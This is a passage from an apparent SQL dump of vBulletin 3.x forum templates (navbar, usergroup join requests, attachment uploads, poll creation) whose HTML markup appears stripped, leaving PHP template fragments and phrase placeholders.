    \r\n \r\n \".(($joinrequested) ? (\"\r\n \" . construct_phrase(\"$vbphrase[requested_to_join_x_at_y]\", \"$joinrequest[date]\", \"$joinrequest[time]\") . \"\r\n \".(($joinrequest[reason]) ? (\"
    $vbphrase[request_reason]: $joinrequest[reason]\") : (\"\")).\"\r\n \") : (\"\r\n \r\n \")).\"\r\n
    \r\n', '\r\n \r\n $usergroup[opentag]$usergroup[title]$usergroup[closetag]\r\n
    $usergroup[description]
    \r\n \r\n \r\n \r\n $vbphrase[requests_approved_by_leader]
    $vbphrase[group_leaders]: $groupleaders\r\n \r\n $vbphrase[anyone_free_to_join_group]\r\n
    \r\n
    \r\n \r\n \r\n $vbphrase[requested_to_join_x_at_y]\r\n
    $vbphrase[request_reason]: $joinrequest[reason]
    \r\n \r\n \r\n
    \r\n
    \r\n', 'template', 1121360039, 'vBulletin Solutions', '3.5.0 Release Candidate 1', 'vbulletin'), (1447, -1, 'modifyusergroups_requesttojoin', '
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n
    $vbphrase[request_to_join_group]: $usergroup[title]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[join_request]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[reason_for_request]
    \r\n
    $vbphrase[request_reason]:
    \r\n
    \r\n
    \r\n
    \" . construct_phrase(\"$vbphrase[request_to_join_x__moderated_by_leaders]\", \"$usergroup[title]\") . \":
    \r\n
    $groupleaders
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    ', '
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n
    $vbphrase[request_to_join_group]: $usergroup[title]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[join_request]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[reason_for_request]
    \r\n
    $vbphrase[request_reason]:
    \r\n
    \r\n
    \r\n
    $vbphrase[request_to_join_x__moderated_by_leaders]:
    \r\n
    $groupleaders
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    ', 'template', 1208876305, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1448, -1, 'modifyuserlist_confirm', '
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[confirm_user_list_modification]
    \r\n
    \r\n
    \r\n \" . construct_phrase(\"$vbphrase[$confirm_phrase]\", \"$userinfo[username]\") . \"\r\n \".(($show[\'friend_checkbox\']) ? (\"
    \") : (\"\")).\"\r\n \".(($show[\'hiddenfriend\']) ? (\"\") : (\"\")).\"\r\n
    \r\n
    \r\n
    \r\n \r\n \r\n
    \r\n
    \r\n
    ', '
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[confirm_user_list_modification]
    \r\n
    \r\n
    \r\n $vbphrase[$confirm_phrase]\r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n \r\n \r\n
    \r\n
    \r\n
    ', 'template', 1208880910, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1449, -1, 'modifyuserlist_headinclude', '', '', 'template', 1216986311, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1450, -1, 'navbar', '
    \r\n\r\n\r\n\r\n\r\n \r\n\".(($show[\'member\']) ? (\"\r\n \r\n\") : (\"\r\n \r\n\")).\"\r\n\r\n
    \r\n \".((is_array($navbits)) ? (\"\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \\\"$vbphrase[go_back]\\\" options[\'forumhome\'] . \".php\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl_q\'] . \"\\\" accesskey=\\\"1\\\">\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" $navbits[breadcrumb]
    \".(($_SERVER[\'REQUEST_METHOD\'] == \'POST\') ? (\"\\\"\\\"\") : (\"reloadurl . \"\\\">\\\"$vbphrase[reload_this_page]\\\"\")).\" $navbits[lastelement]
    \r\n \") : (\"\r\n \r\n \")).\"\r\n
    \r\n
    \r\n \" . construct_phrase(\"$vbphrase[welcome_x_link_y]\", \"\" . $GLOBALS[\'vbulletin\']->userinfo[\'username\'] . \"\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=\" . $GLOBALS[\'vbulletin\']->userinfo[\'userid\'] . \"\") . \"
    \r\n \" . construct_phrase(\"$vbphrase[last_visited_x_at_y]\", \"$pmbox[lastvisitdate]\", \"$pmbox[lastvisittime]\") . \"\r\n\r\n \".(($show[\'notifications\']) ? (\"\r\n \r\n \".(($show[\'popups\']) ? (\"\r\n \r\n \") : (\"\r\n \r\n \r\n \")).\"\r\n \") : (\"\".(($show[\'pmstats\']) ? (\"\r\n
    \" . construct_phrase(\"$vbphrase[private_messages_nav]\", \"$vbphrase[unread_x_nav_compiled]\", \"$vbphrase[total_x_nav_compiled]\", \"\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl_q\'] . \"\") . \"
    \r\n \") : (\"\")).\"\")).\"\r\n\r\n \".(($show[\'pmwarning\']) ? (\"
    \" . construct_phrase(\"$vbphrase[your_pm_box_is_x_full]\", \"$vbphrase[pmpercent_nav_compiled]\") . \"
    \") : (\"\")).\"\r\n
    \r\n
    \r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n
    \r\n \r\n
    \r\n\r\n\r\n\r\n
    \r\n \r\n \r\n \".(($show[\'member\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'registerbutton\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n $template_hook[navbar_buttons_left]\r\n \r\n \".(($show[\'communitylink\'] AND $show[\'popups\']) ? (\"\r\n \r\n \") : (\"\r\n \".(($show[\'memberslist\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'quick_links_groups\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \")).\"\r\n \r\n \".(($show[\'popups\']) ? (\"\r\n \".(($show[\'searchbuttons\']) ? (\"\r\n \".(($show[\'member\']) ? (\"\r\n \r\n \") : (\"\r\n \r\n \")).\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'member\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \") : (\"\r\n \".(($show[\'searchbuttons\']) ? (\"\r\n \r\n \".(($show[\'member\']) ? (\"\r\n \r\n \") : (\"\r\n \r\n \")).\"\r\n \") : (\"\")).\"\r\n \r\n \".(($show[\'member\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \")).\"\r\n $template_hook[navbar_buttons_right]\r\n \".(($show[\'member\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n
    session->vars[\'sessionurl_q\'] . \"\\\">$vbphrase[user_cp]session->vars[\'sessionurl_q\'] . \"\\\" rel=\\\"nofollow\\\">$vbphrase[register]session->vars[\'sessionurl_q\'] . \"\\\" accesskey=\\\"5\\\">$vbphrase[faq]$vbphrase[community] session->vars[\'sessionurl_q\'] . \"\\\">$vbphrase[members_list]session->vars[\'sessionurl\'] . \"\\\">$vbphrase[social_groups]session->vars[\'sessionurl_q\'] . \"\\\">$vbphrase[calendar]session->vars[\'sessionurl\'] . \"do=getnew\\\" accesskey=\\\"2\\\">$vbphrase[new_posts_nav]session->vars[\'sessionurl\'] . \"do=getdaily\\\" accesskey=\\\"2\\\">$vbphrase[todays_posts]session->vars[\'sessionurl_q\'] . \"\\\" accesskey=\\\"4\\\" rel=\\\"nofollow\\\">$vbphrase[search] \".(($show[\'quicksearch\']) ? (\"\") : (\"\")).\"$vbphrase[quick_links] session->vars[\'sessionurl_q\'] . \"\\\" accesskey=\\\"4\\\">$vbphrase[search]session->vars[\'sessionurl\'] . \"do=getnew\\\" accesskey=\\\"2\\\">$vbphrase[new_posts_nav]session->vars[\'sessionurl\'] . \"do=getdaily\\\" accesskey=\\\"2\\\">$vbphrase[todays_posts]session->vars[\'sessionurl\'] . \"do=markread&markreadhash=\" . $GLOBALS[\'vbulletin\']->userinfo[\'securitytoken\'] . \"\\\" rel=\\\"nofollow\\\">$vbphrase[mark_forums_read]session->vars[\'sessionurl\'] . \"do=buddylist&focus=1\',\'buddylist\',\'statusbar=no,menubar=no,toolbar=no,scrollbars=yes,resizable=yes,width=250,height=300\'); return false;\\\">$vbphrase[open_contacts]session->vars[\'sessionurl\'] . \"do=logout&logouthash=\" . $GLOBALS[\'vbulletin\']->userinfo[\'logouthash\'] . \"\\\" onclick=\\\"return log_out(\'$vbphrase[sure_you_want_to_log_out]\')\\\">$vbphrase[log_out]
    \r\n
    \r\n\r\n\r\n
    \r\n\r\n\".(($show[\'notices\']) ? (\"\r\n
    \r\n\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[notices]
    \r\n $notices\r\n
    \r\n
    \r\n
    \r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'forumdesc\']) ? (\"\r\n \r\n \r\n \r\n \r\n
    $foruminfo[title] $foruminfo[description]
    \r\n
    \r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'popups\']) ? (\"\r\n\r\n\r\n \".(($show[\'communitylink\']) ? (\"\r\n \r\n
    \r\n \r\n \r\n $template_hook[navbar_community_menu_start]\r\n \".(($show[\'quick_links_groups\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'quick_links_albums\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($GLOBALS[\'vbulletin\']->userinfo[\'userid\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'memberslist\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n $template_hook[navbar_community_menu_end]\r\n
    $vbphrase[community_links]
    session->vars[\'sessionurl_q\'] . \"\\\">$vbphrase[social_groups]
    session->vars[\'sessionurl_q\'] . \"\\\">$vbphrase[pictures_and_albums]
    session->vars[\'sessionurl\'] . \"do=buddylist\\\">\".(($show[\'friends_and_contacts\']) ? (\"$vbphrase[contacts_and_friends]\") : (\"$vbphrase[contacts]\")).\"
    session->vars[\'sessionurl_q\'] . \"\\\">$vbphrase[members_list]
    \r\n
    \r\n \r\n \") : (\"\")).\"\r\n \r\n \".(($show[\'searchbuttons\']) ? (\"\r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \".(($GLOBALS[\'vbulletin\']->options[threadtagging]) ? (\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n \r\n \r\n \r\n $template_hook[navbar_search_menu]\r\n
    $vbphrase[search_forums]
    \r\n
    \r\n\r\n \r\n \r\n \r\n \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n
    \r\n
    \r\n \r\n  \r\n \r\n
    \r\n
    \r\n
    session->vars[\'sessionurl_q\'] . \"\\\" rel=\\\"nofollow\\\">$vbphrase[tag_search]
    session->vars[\'sessionurl_q\'] . \"\\\" accesskey=\\\"4\\\" rel=\\\"nofollow\\\">$vbphrase[advanced_search]
    \r\n
    \r\n \r\n \") : (\"\")).\"\r\n \r\n \".(($show[\'member\']) ? (\"\r\n \r\n
    \r\n \r\n\r\n \r\n \".(($GLOBALS[\'vbulletin\']->options[\'enablesearches\']) ? (\"\") : (\"\")).\"\r\n \r\n \r\n $template_hook[navbar_quick_links_menu_pos1]\r\n $template_hook[navbar_quick_links_menu_pos2]\r\n\r\n \r\n \".(($show[\'siglink\']) ? (\"\") : (\"\")).\"\r\n \r\n \r\n \r\n $template_hook[navbar_quick_links_menu_pos3]\r\n\r\n \r\n \".(($show[\'pmmainlink\']) ? (\"\") : (\"\")).\"\r\n \r\n \r\n \".(($show[\'wollink\']) ? (\"\") : (\"\")).\"\r\n $template_hook[navbar_quick_links_menu_pos4]\r\n\r\n
    $vbphrase[quick_links]
    session->vars[\'sessionurl\'] . \"do=getdaily\\\">$vbphrase[todays_posts]
    session->vars[\'sessionurl\'] . \"do=markread&markreadhash=\" . $GLOBALS[\'vbulletin\']->userinfo[\'securitytoken\'] . \"\\\">$vbphrase[mark_forums_read]
    session->vars[\'sessionurl\'] . \"do=buddylist&focus=1\',\'buddylist\',\'statusbar=no,menubar=no,toolbar=no,scrollbars=yes,resizable=yes,width=250,height=300\'); return false;\\\">$vbphrase[open_contacts]
    session->vars[\'sessionurl_q\'] . \"\\\">$vbphrase[user_control_panel]
    session->vars[\'sessionurl\'] . \"do=editsignature\\\">$vbphrase[edit_signature]
    session->vars[\'sessionurl\'] . \"do=editprofile\\\">$vbphrase[edit_your_details]
    session->vars[\'sessionurl\'] . \"do=editoptions\\\">$vbphrase[edit_options]
    $vbphrase[miscellaneous]
    session->vars[\'sessionurl_q\'] . \"\\\" rel=\\\"nofollow\\\">$vbphrase[private_messages]
    session->vars[\'sessionurl_q\'] . \"\\\" rel=\\\"nofollow\\\">$vbphrase[subscribed_threads]
    session->vars[\'sessionurl\'] . \"u=\" . $GLOBALS[\'vbulletin\']->userinfo[\'userid\'] . \"\\\">$vbphrase[your_profile]
    session->vars[\'sessionurl_q\'] . \"\\\">$vbphrase[whos_online]
    \r\n
    \r\n \r\n\r\n \") : (\"\")).\"\r\n\r\n\r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[go_to_page]
    \r\n
    options[\'forumhome\'] . \".php\\\" method=\\\"get\\\" onsubmit=\\\"return this.gotopage()\\\" id=\\\"pagenav_form\\\">\r\n \r\n \r\n
    \r\n
    \r\n
    \r\n\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'member\'] AND $notifications_total) ? (\"\r\n\r\n
    \r\n \r\n \r\n $notifications_menubits\r\n
    $vbphrase[your_notifications]
    \r\n
    \r\n\r\n\") : (\"\")).\"\r\n\r\n$ad_location[ad_navbar_below]', '
    \r\n\r\n\r\n\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \"$vbphrase[go_back]\" $vboptions[bbtitle] $navbits[breadcrumb]
    \"\"\"$vbphrase[reload_this_page]\" $navbits[lastelement]
    \r\n \r\n
    \"\" $vboptions[bbtitle]
    \r\n
    \r\n
    \r\n
    \r\n $vbphrase[welcome_x_link_y]
    \r\n $vbphrase[last_visited_x_at_y]\r\n\r\n \r\n
    $vbphrase[your_notifications]: $notifications_total
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[private_messages_nav]
    \r\n
    \r\n\r\n
    $vbphrase[your_pm_box_is_x_full]
    \r\n
    \r\n
    \r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n
    \r\n\r\n\r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n $template_hook[navbar_buttons_left]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n $template_hook[navbar_buttons_right]\r\n \r\n \r\n \r\n \r\n
    $vbphrase[user_cp]$vbphrase[register]$vbphrase[faq]$vbphrase[community] $vbphrase[members_list]$vbphrase[social_groups]$vbphrase[calendar]$vbphrase[new_posts_nav]$vbphrase[todays_posts]$vbphrase[search] $vbphrase[quick_links] $vbphrase[search]$vbphrase[new_posts_nav]$vbphrase[todays_posts]$vbphrase[mark_forums_read]$vbphrase[open_contacts]$vbphrase[log_out]
    \r\n
    \r\n\r\n\r\n
    \r\n\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[notices]
    \r\n $notices\r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n\r\n \r\n \r\n \r\n \r\n
    $foruminfo[title] $foruminfo[description]
    \r\n
    \r\n
    \r\n\r\n\r\n\r\n\r\n \r\n \r\n
    \r\n \r\n \r\n $template_hook[navbar_community_menu_start]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n $template_hook[navbar_community_menu_end]\r\n
    $vbphrase[community_links]
    $vbphrase[social_groups]
    $vbphrase[pictures_and_albums]
    $vbphrase[contacts_and_friends]$vbphrase[contacts]
    $vbphrase[members_list]
    \r\n
    \r\n \r\n
    \r\n \r\n \r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n $template_hook[navbar_search_menu]\r\n
    $vbphrase[search_forums]
    \r\n
    \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n \r\n  \r\n \r\n
    \r\n
    \r\n
    $vbphrase[tag_search]
    $vbphrase[advanced_search]
    \r\n
    \r\n \r\n
    \r\n \r\n \r\n \r\n
    \r\n \r\n\r\n \r\n \r\n \r\n \r\n $template_hook[navbar_quick_links_menu_pos1]\r\n $template_hook[navbar_quick_links_menu_pos2]\r\n\r\n \r\n \r\n \r\n \r\n \r\n $template_hook[navbar_quick_links_menu_pos3]\r\n\r\n \r\n \r\n \r\n \r\n \r\n $template_hook[navbar_quick_links_menu_pos4]\r\n\r\n
    $vbphrase[quick_links]
    $vbphrase[todays_posts]
    $vbphrase[mark_forums_read]
    $vbphrase[open_contacts]
    $vbphrase[user_control_panel]
    $vbphrase[edit_signature]
    $vbphrase[edit_your_details]
    $vbphrase[edit_options]
    $vbphrase[miscellaneous]
    $vbphrase[private_messages]
    $vbphrase[subscribed_threads]
    $vbphrase[your_profile]
    $vbphrase[whos_online]
    \r\n
    \r\n \r\n\r\n
    \r\n\r\n\r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[go_to_page]
    \r\n
    \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n
    \r\n \r\n \r\n $notifications_menubits\r\n
    $vbphrase[your_notifications]
    \r\n
    \r\n\r\n
    \r\n\r\n$ad_location[ad_navbar_below]', 'template', 1267771772, 'vBulletin Solutions', '3.8.5', 'vbulletin'), (1451, -1, 'navbar_link', '\".(($show[\'breadcrumb\']) ? (\"\r\n > $nav_title\r\n\") : (\"\r\n $nav_title\r\n\")).\"\r\n', '\r\n > $nav_title\r\n\r\n $nav_title\r\n\r\n', 'template', 1070543944, 'vBulletin Solutions', '', 'vbulletin'), (1452, -1, 'navbar_noticebit', '
    \r\n \".(($show[dismiss_link]) ? (\"\") : (\"\")).\"$notice_html\r\n
    ', '
    \r\n $notice_html\r\n
    ', 'template', 1231172935, 'vBulletin Solutions', '3.8.0 Release Candidate 3', 'vbulletin'), (1453, -1, 'navbar_notifications_menubit', '\r\n 0) ? (\" style=\\\"font-weight:bold\\\"\") : (\"\")).\">$notification[phrase]\r\n 0) ? (\" style=\\\"font-weight:bold\\\"\") : (\"\")).\">$notification[total]\r\n', '\r\n 0\"> style=\"font-weight:bold\"
    >$notification[phrase]\r\n 0\"> style=\"font-weight:bold\"
    >$notification[total]\r\n', 'template', 1203615317, 'vBulletin Solutions', '3.7.0 Beta 6', 'vbulletin'), (1454, -1, 'newattachment', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vbphrase[manage_attachments] - \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \"\r\n\r\n\r\n\r\n\r\n\r\n
    \r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\".(($show[\'errors\']) ? (\"\r\n\r\n \r\n\r\n$errorlist\r\n\") : (\"\")).\"\r\n\r\n \r\n\r\n
    \r\n $vbphrase[close_this_window]\r\n $vbphrase[manage_attachments]\r\n
    $vbphrase[upload_errors]
    \r\n
    \r\n
    \r\n\r\n \".(($show[\'attachmentlimits\']) ? (\"\r\n
    \r\n
    \r\n \" . construct_phrase(\"$vbphrase[sum_of_attachments_owned_by_x]\", \"$attach_username\") . \":\r\n $attachsum
    \r\n \r\n \r\n \".(($show[\'currentsize\']) ? (\"\") : (\"\")).\"\r\n \".(($show[\'totalsize\']) ? (\"\") : (\"\")).\"\r\n \r\n
      
    \r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'attachoption\']) ? (\"\r\n \".(($show[\'attachfile\']) ? (\"\r\n
    \r\n $vbphrase[upload_file_from_your_computer]\r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n $attachinput\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n \".(($show[\'attachurl\']) ? (\"\r\n
    \r\n $vbphrase[upload_file_from_url]\r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $attachurlinput\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n \") : (\"\r\n
    \r\n $vbphrase[upload_file]\r\n \".(($show[\'forumclosed\']) ? (\"\r\n $vbphrase[this_forum_is_not_accepting_new_attachments]\r\n \") : (\"\r\n \" . construct_phrase(\"$vbphrase[have_uploaded_maximum_x_files]\", \"\" . $GLOBALS[\'vbulletin\']->options[\'attachlimit\'] . \"\") . \"\r\n \")).\"\r\n
    \r\n \")).\"\r\n\r\n \".(($show[\'attachmentlist\']) ? (\"\r\n
    \r\n $vbphrase[current_attachments] ($totallimit)\r\n
    \r\n \r\n $attachments\r\n
    \r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n
    \r\n $vbphrase[uploading_file]\r\n
    \r\n\r\n\r\n \r\n \r\n \r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n $attachkeybits\r\n \r\n
    \r\n \\\"\\\"\r\n $vbphrase[attachment_key]\r\n
    $vbphrase[filetype]$vbphrase[max_filesize]$vbphrase[max_width]$vbphrase[max_height]
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n
    \r\n\r\n
    \r\n\r\n\r\n
    \r\n
    \r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vbphrase[manage_attachments] - $vboptions[bbtitle]\r\n\r\n\r\n\r\n\r\n\r\n
    \r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n$errorlist\r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[close_this_window]\r\n $vbphrase[manage_attachments]\r\n
    $vbphrase[upload_errors]
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n
    \r\n $vbphrase[sum_of_attachments_owned_by_x]:\r\n $attachsum
    \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[current_attachment_total_x]\"> $vbphrase[maximum_attachment_storage_x]\"> 
    \r\n
    \r\n
    \r\n
    \r\n\r\n \r\n \r\n
    \r\n $vbphrase[upload_file_from_your_computer]\r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n $attachinput\r\n
    \r\n
    \r\n
    \r\n \r\n
    \r\n $vbphrase[upload_file_from_url]\r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $attachurlinput\r\n
    \r\n
    \r\n
    \r\n \r\n
    \r\n $vbphrase[upload_file]\r\n \r\n $vbphrase[this_forum_is_not_accepting_new_attachments]\r\n \r\n $vbphrase[have_uploaded_maximum_x_files]\r\n \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[current_attachments] ($totallimit)\r\n
    \r\n \r\n $attachments\r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[uploading_file]\r\n
    \r\n\r\n\r\n \r\n \r\n \r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n $attachkeybits\r\n \r\n
    \r\n \"\"\r\n $vbphrase[attachment_key]\r\n
    $vbphrase[filetype]$vbphrase[max_filesize]$vbphrase[max_width]$vbphrase[max_height]
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n
    \r\n\r\n
    \r\n\r\n\r\n
    \r\n
    \r\n\r\n\r\n', 'template', 1208876362, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1455, -1, 'newattachmentbit', '\r\n \\\"$attach[extension].gif\\\" session->vars[\'sessionurl\'] . \"attachmentid=$attach[attachmentid]&stc=1&d=$attach[dateline]\\\" target=\\\"_blank\\\">$attach[filename] ($attach[filesize])\r\n \r\n', '\r\n \"$attach[extension].gif\" $attach[filename] ($attach[filesize])\r\n \r\n', 'template', 1105654221, 'vBulletin Solutions', '3.5.0 Beta 1', 'vbulletin'), (1456, -1, 'newattachment_errormessage', '\r\n
    \r\n $filename:
    \r\n $errormessage\r\n
    \r\n\r\n', '\r\n
    \r\n $filename:
    \r\n $errormessage\r\n
    \r\n\r\n', 'template', 1069935876, 'vBulletin Solutions', '', 'vbulletin'), (1457, -1, 'newattachment_keybit', '\r\n \\\"\\\" $extension[extension]\r\n $extension[size]\r\n $extension[width]\r\n $extension[height]\r\n', '\r\n \"\" $extension[extension]\r\n $extension[size]\r\n $extension[width]\r\n $extension[height]\r\n', 'template', 1116009176, 'vBulletin Solutions', '3.5.0 Beta 1', 'vbulletin'), (1458, -1, 'newpoll', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[post_a_poll]\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n
    \r\n\r\n
    \r\n\r\n$pollpreview\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[thread]: $threadinfo[prefix_plain_html] session->vars[\'sessionurl\'] . \"t=$threadinfo[threadid]\\\">$threadinfo[title]\r\n $vbphrase[post_a_poll]\r\n
    \r\n
    \r\n
    \r\n\r\n $usernamecode\r\n\r\n
    \r\n
    :
    \r\n options[\'titlemaxchars\'] . \"\\\" tabindex=\\\"1\\\" />\r\n
    \r\n\r\n
    \r\n $vbphrase[number_of_poll_options]\r\n
    \r\n \r\n    \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[poll_options]\r\n \r\n $pollnewbits\r\n \r\n \r\n \r\n
    $vbphrase[keep_poll_options_short]
    \r\n
    \r\n\r\n
    \r\n $vbphrase[poll_timeout]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[automatically_close_poll_enter_days]
    \r\n
    \r\n\r\n
    \r\n $vbphrase[miscellaneous_options]\r\n
    \r\n
    \r\n
    \r\n \".(($show[\'parseurl\']) ? (\"
    \") : (\"\")).\"\r\n $disablesmiliesoption\r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n$forumrules\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[post_a_poll]\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n
    \r\n\r\n
    \r\n\r\n$pollpreview\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[thread]: $threadinfo[prefix_plain_html] $threadinfo[title]\r\n $vbphrase[post_a_poll]\r\n
    \r\n
    \r\n
    \r\n\r\n $usernamecode\r\n\r\n
    \r\n
    :
    \r\n \r\n
    \r\n\r\n
    \r\n $vbphrase[number_of_poll_options]\r\n
    \r\n \r\n    \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[poll_options]\r\n \r\n $pollnewbits\r\n \r\n \r\n \r\n
    $vbphrase[keep_poll_options_short]
    \r\n
    \r\n\r\n
    \r\n $vbphrase[poll_timeout]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[automatically_close_poll_enter_days]
    \r\n
    \r\n\r\n
    \r\n $vbphrase[miscellaneous_options]\r\n
    \r\n
    \r\n
    \r\n
    \r\n $disablesmiliesoption\r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
